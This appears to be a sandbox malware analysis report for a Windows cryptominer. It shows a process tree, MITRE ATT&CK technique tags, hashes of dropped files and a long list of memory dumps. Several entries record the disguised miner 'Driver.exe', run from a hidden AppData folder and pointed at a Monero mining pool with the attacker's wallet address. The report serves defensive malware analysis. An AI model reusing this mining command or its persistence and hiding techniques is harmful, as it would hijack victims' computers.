      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2856
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1196
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2260

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1406921035-1447846698-5099273631332763867-8049192854435221601679378087-468565676"
1⤵
PID:2084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14926800231430032144-19221403122057756812-1423047525-1999144014-497231397537134148"
1⤵
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10403027252032021382-18535547111904955665-457531665-215201535-1951338944394700234"
1⤵
PID:1476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-408710896-658719070-2049481150-1450783954-1667812301-1249591173-95679649-336264738"
1⤵
PID:2168

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-57997335281193504746029863810426753081156238374-1863198022893149354628605226"
1⤵
PID:2424

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1651186092-14940359731324692520-1315310005-184392552881557846414904327921718378379"
1⤵
PID:1336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.2MB

MD5
d39425a0656846d077a08d88c3a1eafd

SHA1
11543c91ae879a1ee2218989da8b607db8b6ce83

SHA256
d07755415a96e885071720b882f91484be8f00dd14d0c04f294f759425eeeeb3

SHA512
20b395b137d8fee88d57e02158e5dfb840d0d5b969332c95d6f3d39f9dec7833e2198eea9bbe144da3ec62850aa1efe622ca4b0fa743285381591ccc2c2e24dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

Filesize
4.0MB

MD5
38f702eca36f4991a2ca55a61e72cb2d

SHA1
854064e8d9d3724b9913f3ba47628bad8d150268

SHA256
b9057ff1f55c599ee6b322de47cad13dc8d74b63a5a322faf565a610846cca6a

SHA512
de46d99091ae5e7df2cd6d89d3a38bdd4d7e1bbb55526d123e97a83d7966e91b910040d637af4aac500bb266cbad464947bebc0789b6c66102d50837d100a480

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
1.7MB

MD5
e28fd981b387bbb881349af3aed72a14

SHA1
ccc7321776b8258fae70a199721a2c94b31a0dbd

SHA256
c424d7cac793cfbee144add7c081146d6395eb082d85ff2239f923488b36c784

SHA512
8af8463a82b7f8cc2bcd47e10d630ad88a1aefa177ca3f444bcfa440eddeb5946468858846ea09fb863a6994caa0baf41bc80b1099d47a38da6f03b60e1510b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

Filesize
3.3MB

MD5
f818b9273775a3e36a2cec53d77d92aa

SHA1
1f9a69bc57779cc2ffc5055779f19a89b0590899

SHA256
8261f8f25a906439b6a8c87abb58eae50b10f642295559a7cf7563e4584e5bd8

SHA512
133fcad998f9f90960e33df7720f35be3ed3fbbba0058ec9ee5c563e8645225f14430fd4b3e503cecd40627701a1600335bcd184b6de133ca092303ab2c5cc1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
3.3MB

MD5
b4f16494a066087384577934692b7dc0

SHA1
7324629c7bf5a4c39def42892f6297d6fa01aa89

SHA256
0cc20065191fd1d64ac99fea586277e1dcb883adf403fc4228deecb9f5d91099

SHA512
905c161f897e177ee1951ed25a5b2eb1f77093306bacdebec0d9b7c703f4aec814f5da332525d135bea0df9f52705998e8ced6f81262f1689bdc6fc1dc99b0af

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
475B

MD5
854e13db0bbb65f40103fd9109e52253

SHA1
d6e56d1751641e68527b001d3d946bdc7423297c

SHA256
9c6a028767dd856c4aebb824f845f5e53c90b9568c22d87076bda6aa798f31e3

SHA512
728a8b7e5a44323606215dc085543408f33decbcc85649f0955730ab82626e184ac4dd2a2a7b085616aca9320cafecbe1c0d88c9d615222c6d264c03afa30dd0

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
memory/380-124-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/380-123-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/660-78-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/660-80-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/760-151-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/760-152-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1244-164-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1244-104-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1264-366-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1264-364-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1296-158-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1296-157-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1324-228-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1324-229-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1324-205-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1448-258-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1448-261-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1452-311-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1476-235-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1508-285-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1508-287-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1540-328-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1540-74-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1580-186-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1580-187-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1604-376-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1612-175-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1644-181-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1644-349-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1644-180-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1644-234-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1652-246-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1652-247-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1684-334-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1684-332-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1692-293-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1720-358-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1720-217-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1720-360-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1720-216-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1820-299-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1888-91-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1908-116-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1948-354-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1988-267-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2000-223-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2000-222-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2060-96-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2060-97-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2080-254-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2080-252-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2084-63-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2084-62-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2096-344-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2104-163-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2112-69-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2112-68-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2132-210-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2132-211-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2168-280-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2340-339-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2340-110-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2340-111-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2424-198-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2424-199-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2432-129-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2476-371-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2568-140-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2624-318-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2624-316-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2640-145-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2640-146-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2720-46-0x0000000073CF0000-0x00000000743DE000-memory.dmp

Filesize
6.9MB

Download
memory/2720-54-0x0000000007040000-0x0000000007BB5000-memory.dmp

Filesize
11.5MB

Download
memory/2720-49-0x00000000023F0000-0x0000000002430000-memory.dmp

Filesize
256KB

Download
memory/2720-108-0x00000000023F0000-0x0000000002430000-memory.dmp

Filesize
256KB

Download
memory/2720-101-0x0000000073CF0000-0x00000000743DE000-memory.dmp

Filesize
6.9MB

Download
memory/2720-117-0x0000000007040000-0x0000000007BB5000-memory.dmp

Filesize
11.5MB

Download
memory/2720-45-0x0000000000320000-0x000000000071E000-memory.dmp

Filesize
4.0MB

Download
memory/2820-272-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2820-274-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2840-192-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2840-193-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2852-85-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2852-86-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2856-169-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2856-170-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2876-134-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2876-135-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2944-240-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2964-56-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2964-118-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2964-55-0x00000000001F0000-0x0000000000204000-memory.dmp

Filesize
80KB

Download
memory/2964-57-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2980-305-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download